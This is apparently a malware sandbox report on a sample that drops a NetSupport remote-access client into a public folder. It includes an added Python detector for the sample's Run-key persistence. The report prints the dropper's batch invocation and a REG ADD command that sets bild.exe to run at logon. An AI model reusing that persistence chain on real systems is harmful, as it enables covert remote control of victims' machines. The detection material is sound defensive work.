                                Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 4_2_1101F6B0 OpenClipboard,GlobalAlloc,GlobalLock,_memmove,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,MessageBeep,CloseClipboard
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 5_2_1101F6B0 OpenClipboard,GlobalAlloc,GlobalLock,_memmove,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,MessageBeep,CloseClipboard
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 5_2_11032EE0 GetClipboardFormatNameA,SetClipboardData
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 4_2_110321E0 GlobalAlloc,GlobalLock,_memmove,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalFree
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 4_2_110076F0 LoadCursorA,SetCursor,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,CreateDCA,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,SelectClipRgn,BitBlt,SelectClipRgn,DeleteObject,DeleteDC,BitBlt,ReleaseDC,CreatePen,CreateSolidBrush,GetSysColor,LoadBitmapA,_memset,_swscanf,CreateFontIndirectA,_memset,GetStockObject,GetObjectA,CreateFontIndirectA,GetWindowRect,SetWindowTextA,GetSystemMetrics,GetSystemMetrics,SetWindowPos,UpdateWindow,SetCursor
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 4_2_11113880 PeekMessageA,GetKeyState,GetKeyState,GetKeyState,Sleep,GetKeyState
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 5_2_11113880 PeekMessageA,GetKeyState,GetKeyState,GetKeyState,Sleep,GetKeyState
Source: Yara match | File source: 5.2.bild.exe.111b79e0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.bild.exe.111b79e0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.bild.exe.111b79e0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.3.file.exe.2e94800.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.bild.exe.11000000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.bild.exe.11000000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.bild.exe.11000000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000009.00000002.1905822054.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.1827605672.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.1700783369.0000000002CE5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: file.exe PID: 7284, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: bild.exe PID: 7552, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: bild.exe PID: 7720, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: bild.exe PID: 7988, type: MEMORYSTR
Source: Yara match | File source: C:\Users\Public\Public\Videos\Video\PCICL32.DLL, type: DROPPED

Spam, unwanted Advertisements and Ransom Demands

Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 4_2_111158B0 SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,RegCloseKey,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,RegCloseKey,SystemParametersInfoA
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 5_2_111158B0 SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,RegCloseKey,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,RegCloseKey,SystemParametersInfoA
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Process Stats: CPU usage > 49%
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00157070: __EH_prolog,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 4_2_1115DB40 FindWindowA,_memset,CreateProcessAsUserA,GetLastError,WinExec,CloseHandle,CloseHandle,CloseHandle,WinExec
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 4_2_1102D330 InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,PostThreadMessageA,PostThreadMessageA,CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 5_2_1102D330 InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,PostThreadMessageA,PostThreadMessageA,CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00165984
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00158409
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0015E045
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0017E8D4
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_001630E6
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0016E94A
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0015D1D2
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0015BA1A
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00153203
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0016F25E
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0016FAC8
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00162B3A
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0017A35E
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00172B78
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_001663F2
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0015DBE2
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0015EC97
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00162DB5
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00165DB9
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0015D5E4
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0016EE46
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00155E96
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0016F693
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00179EB0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0015276C
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00164FB5
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00153FC5
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 4_2_110733B0
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 4_2_11029590
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 4_2_11061C90
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 4_2_11033010
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 4_2_11163220
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 4_2_11167485
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 4_2_110454F0
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 4_2_1101B760
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 4_2_111258B0
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 4_2_1101BBA0
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 4_2_11087C60
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 4_2_11070090
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 4_2_11080480
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 4_2_1115E980
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 4_2_1101C9C0
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 4_2_110088AB
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 5_2_11061C90
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 5_2_11033010
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 5_2_110733B0
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 5_2_11163220
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 5_2_11029590
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 5_2_11167485
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 5_2_110454F0
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 5_2_1101B760
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 5_2_111258B0
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 5_2_1101BBA0
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 5_2_11087C60
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 5_2_11070090
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 5_2_11080480
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 5_2_1115E980
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 5_2_1101C9C0
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 5_2_110088AB
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 5_2_11050D80
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Process token adjusted: Security
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: String function: 110B7A20 appears 40 times
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: String function: 11146450 appears 1118 times
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: String function: 1109D8C0 appears 32 times
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: String function: 11146EC0 appears 41 times
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: String function: 110278E0 appears 94 times
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: String function: 1116F010 appears 67 times
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: String function: 11029450 appears 1830 times
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: String function: 111603E3 appears 76 times
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: String function: 11173663 appears 36 times
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: String function: 1105DD10 appears 566 times
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: String function: 11081BB0 appears 77 times
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: String function: 1105DE40 appears 54 times
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: String function: 11164010 appears 64 times
Source: C:\Users\user\Desktop\file.exe | Code function: String function: 0016CDF0 appears 37 times
Source: C:\Users\user\Desktop\file.exe | Code function: String function: 0016CEC0 appears 53 times
Source: C:\Users\user\Desktop\file.exe | Code function: String function: 0016D870 appears 31 times
Source: file.exe, 00000000.00000003.1700783369.0000000002CE5000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamemsvcr100_clr0400.dll^ vs file.exe
Source: file.exe, 00000000.00000003.1700783369.0000000002FFE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamepcicl32.dll2 vs file.exe
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Public\Videos\Video\bild.exe"
Source: classification engine | Classification label: mal88.rans.evad.winEXE@11/13@1/2
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 4_2_11059C50 GetLastError,FormatMessageA,LocalFree
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 4_2_1109D440 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 4_2_1109D4D0 AdjustTokenPrivileges,CloseHandle
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 5_2_1109D440 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 5_2_1109D4D0 AdjustTokenPrivileges,CloseHandle
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 4_2_11115B70 CoInitialize,CoCreateInstance,LoadLibraryA,GetProcAddress,SHGetSettings,FreeLibrary,CoUninitialize
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00168BD0 FindResourceW,DeleteObject,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,CreateStreamOnHGlobal,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 4_2_11127E10 GetMessageA,Sleep,OpenSCManagerA,DispatchMessageA,OpenServiceA,CloseServiceHandle,StartServiceA,GetLastError,CloseServiceHandle,CloseServiceHandle,GetLastError,CloseServiceHandle,GetLastError
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\Public\Public
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7464:120:WilError_03
Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Public\Videos\Video\netsup.bat" "
Source: C:\Users\user\Desktop\file.exe | Command line argument: sfxname 0_2_0016C131
Source: C:\Users\user\Desktop\file.exe | Command line argument: sfxstime 0_2_0016C131
Source: C:\Users\user\Desktop\file.exe | Command line argument: STARTDLG 0_2_0016C131
Source: file.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\file.exe | File read: C:\Windows\win.ini
Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: file.exe | ReversingLabs: Detection: 50%
Source: file.exe | Virustotal: Detection: 51%
Source: C:\Users\user\Desktop\file.exe | File read: C:\Users\user\Desktop\file.exe
Source: unknown | Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Public\Videos\Video\netsup.bat" "
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Public\Videos\Video\bild.exe"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\Public\Public\Videos\Video\bild.exe C:\Users\Public\Public\Videos\Video\bild.exe
Source: unknown | Process created: C:\Users\Public\Public\Videos\Video\bild.exe "C:\Users\Public\Public\Videos\Video\bild.exe"
Source: unknown | Process created: C:\Users\Public\Public\Videos\Video\bild.exe "C:\Users\Public\Public\Videos\Video\bild.exe"
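The process tree above is the whole persistence chain: file.exe unpacks into C:\Users\Public\Public\Videos\Video, cmd.exe runs netsup.bat from there, reg.exe writes an HKCU Run value named "Netstat" whose data is bild.exe, and bild.exe (the NetSupport client, per the Yara matches above) then starts from that folder. This is what the report's Sigma hits "New RUN Key Pointing to Suspicious Folder" and "Execution from Suspicious Folder" match. The Python below is an added example, not part of the Joe Sandbox report or of any Sigma rule: it parses process-creation records, reconstructs the REG ADD arguments, and flags both conditions. The EVENTS records are constructed from the command lines shown above plus one benign control entry; the folder list, field names and rule names are assumptions made for the example.

```python
"""Detection logic for the persistence chain in the process tree above:
reg.exe writing a Run value that points into a user-writable folder, and a
binary executing from such a folder.  Added example, not part of the
Joe Sandbox report; EVENTS is constructed from the command lines the
report shows, plus one benign control record."""
import re

# Folders an unprivileged user can write to.  A Run value pointing here, or
# an image executing from here, is what the report's Sigma hits describe.
# The list is an assumption for this example, not an exhaustive one.
SUSPICIOUS_FOLDERS = (
    "c:/users/public/",
    "c:/programdata/",
    "c:/windows/temp/",
    "c:/perflogs/",
    "/appdata/local/temp/",
    "/appdata/roaming/",
)

# HKCU or HKLM ...\CurrentVersion\Run or RunOnce, as REG ADD names the key.
RUN_KEY_RE = re.compile(
    r"^(?:HKCU|HKEY_CURRENT_USER|HKLM|HKEY_LOCAL_MACHINE)\\.*"
    r"\\CurrentVersion\\(?:Run|RunOnce)$",
    re.IGNORECASE,
)

# REG ADD <key> [/V name] [/t type] [/F] [/D data]; key and data may be quoted.
REG_ADD_RE = re.compile(r'^\s*reg(?:\.exe)?\s+add\s+(?:"([^"]+)"|(\S+))', re.IGNORECASE)
REG_OPT_RE = re.compile(r'/(v|d)\s+(?:"([^"]*)"|(\S+))', re.IGNORECASE)


def normalize(path):
    """Lower-case with forward slashes so substring checks are simple."""
    return path.strip().lower().replace("\\", "/")


def is_suspicious_path(path):
    """True when the path lies inside one of SUSPICIOUS_FOLDERS."""
    p = normalize(path)
    return any(folder in p for folder in SUSPICIOUS_FOLDERS)


def parse_reg_add(cmdline):
    """Return {'key', 'value_name', 'data'} for a REG ADD command line, else None."""
    m = REG_ADD_RE.match(cmdline)
    if not m:
        return None
    parsed = {"key": m.group(1) or m.group(2), "value_name": None, "data": None}
    for opt, quoted, bare in REG_OPT_RE.findall(cmdline[m.end():]):
        value = quoted if quoted else bare
        parsed["value_name" if opt.lower() == "v" else "data"] = value
    return parsed


def analyze(events):
    """Apply both checks to process-creation records; return a list of findings."""
    findings = []
    for ev in events:
        image = ev["Image"]
        if normalize(image).endswith("/reg.exe"):
            reg = parse_reg_add(ev["CommandLine"])
            if (reg and reg["data"] and RUN_KEY_RE.match(reg["key"])
                    and is_suspicious_path(reg["data"])):
                findings.append({
                    "rule": "run_key_to_suspicious_folder",
                    "key": reg["key"],
                    "value_name": reg["value_name"],
                    "target": reg["data"],
                    "parent": ev["ParentImage"],
                })
        if is_suspicious_path(image):
            findings.append({
                "rule": "execution_from_suspicious_folder",
                "image": image,
                "parent": ev["ParentImage"],
            })
    return findings


# Constructed records: the three report command lines and one benign Run entry.
EVENTS = [
    {"ParentImage": r"C:\Users\user\Desktop\file.exe",
     "Image": r"C:\Windows\SysWOW64\cmd.exe",
     "CommandLine": r'C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Public\Videos\Video\netsup.bat" "'},
    {"ParentImage": r"C:\Windows\SysWOW64\cmd.exe",
     "Image": r"C:\Windows\SysWOW64\reg.exe",
     "CommandLine": r'REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Public\Videos\Video\bild.exe"'},
    {"ParentImage": r"C:\Windows\SysWOW64\cmd.exe",
     "Image": r"C:\Users\Public\Public\Videos\Video\bild.exe",
     "CommandLine": r"C:\Users\Public\Public\Videos\Video\bild.exe"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\reg.exe",
     "CommandLine": r'REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "OneDrive" /t REG_SZ /F /D "C:\Program Files\Microsoft OneDrive\OneDrive.exe"'},
]

if __name__ == "__main__":
    for finding in analyze(EVENTS):
        print(finding)
```

Run against EVENTS this yields two findings, one per rule, and nothing for the Program Files control entry. The value name "Netstat" borrows a built-in tool's name, so alerting on where the Run value points rather than on what it is called is what catches it. On a live host the same logic runs over Sysmon event ID 1 or Security event 4688 records with command-line auditing enabled; the field names used here follow Sysmon's. A further signal the report supports but this example does not implement: bild.exe loads pcicl32.dll, pcichek.dll and pcicapi.dll (NetSupport Manager components) from the same public folder, so NetSupport modules mapped from outside Program Files are worth a second rule.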
Source: C:\Users\user\Desktop\file.exe | Section loaded: <pi-ms-win-core-synch-l1-2-0.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: <pi-ms-win-core-synch-l1-2-0.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: <pi-ms-win-core-localization-l1-2-1.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: dxgidebug.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: sfc_os.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: dwmapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: riched20.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: usp10.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: msls31.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: windowscodecs.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: textshaping.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: textinputframework.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: coreuicomponents.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: propsys.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: edputil.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: slc.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: sppc.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: pcacli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: cmdext.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: apphelp.dll
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Section loaded: apphelp.dll
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Section loaded: pcicl32.dll
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Section loaded: shfolder.dll
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Section loaded: pcichek.dll
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Section loaded: pcicapi.dll
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Section loaded: mpr.dll
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Section loaded: version.dll
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Section loaded: winmm.dll
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Section loaded: wsock32.dll
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Section loaded: netapi32.dll
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Section loaded: wininet.dll
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Section loaded: msvcr100.dll
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Section loaded: msvcr100.dll
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Section loaded: netutils.dll
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Section loaded: samcli.dll
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Section loaded: dbghelp.dll
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Section loaded: dbgcore.dll
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Section loaded: wtsapi32.dll
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Section loaded: uxtheme.dll
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Section loaded: nsmtrace.dll
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Section loaded: nslsp.dll
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Section loaded: devobj.dll
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Section loaded: msasn1.dll
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Section loaded: pcihooks.dll
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Section loaded: textshaping.dll
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Section loaded: wbemcomn.dll
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Section loaded: winsta.dll
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Section loaded: riched32.dll
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Section loaded: riched20.dll
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Section loaded: usp10.dll
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Section loaded: msls31.dll
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Section loaded: amsi.dll
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Section loaded: userenv.dll
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Section loaded: profapi.dll
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Section loaded: mswsock.dll
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Section loaded: windows.storage.dll
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Section loaded: wldp.dll
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Section loaded: pciinv.dll
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Section loaded: firewallapi.dll
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Section loaded: dnsapi.dll
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Section loaded: iphlpapi.dll
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Section loaded: fwbase.dll
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Section loaded: iertutil.dll
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Section loaded: sspicli.dll
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: dhcpcsvc6.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: dhcpcsvc.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: fwpolicyiomgr.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: winhttp.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: winnsi.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: urlmon.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: rasadhlp.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: fwpuclnt.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: pcicl32.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: shfolder.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: pcichek.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: pcicapi.dllJump to behavior
